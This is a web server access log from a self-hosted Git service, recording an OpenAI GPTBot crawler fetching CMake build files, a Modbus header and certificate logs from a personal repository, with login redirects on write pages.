"/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15255] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:15:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot" -[17/Feb/2026:15:56:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:15:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot" -[17/Feb/2026:15:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15437] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15434] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15437] [Gzip 8.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21651] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10821] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10821] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:15:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot" -[17/Feb/2026:15:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21651] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21648] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13927] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr 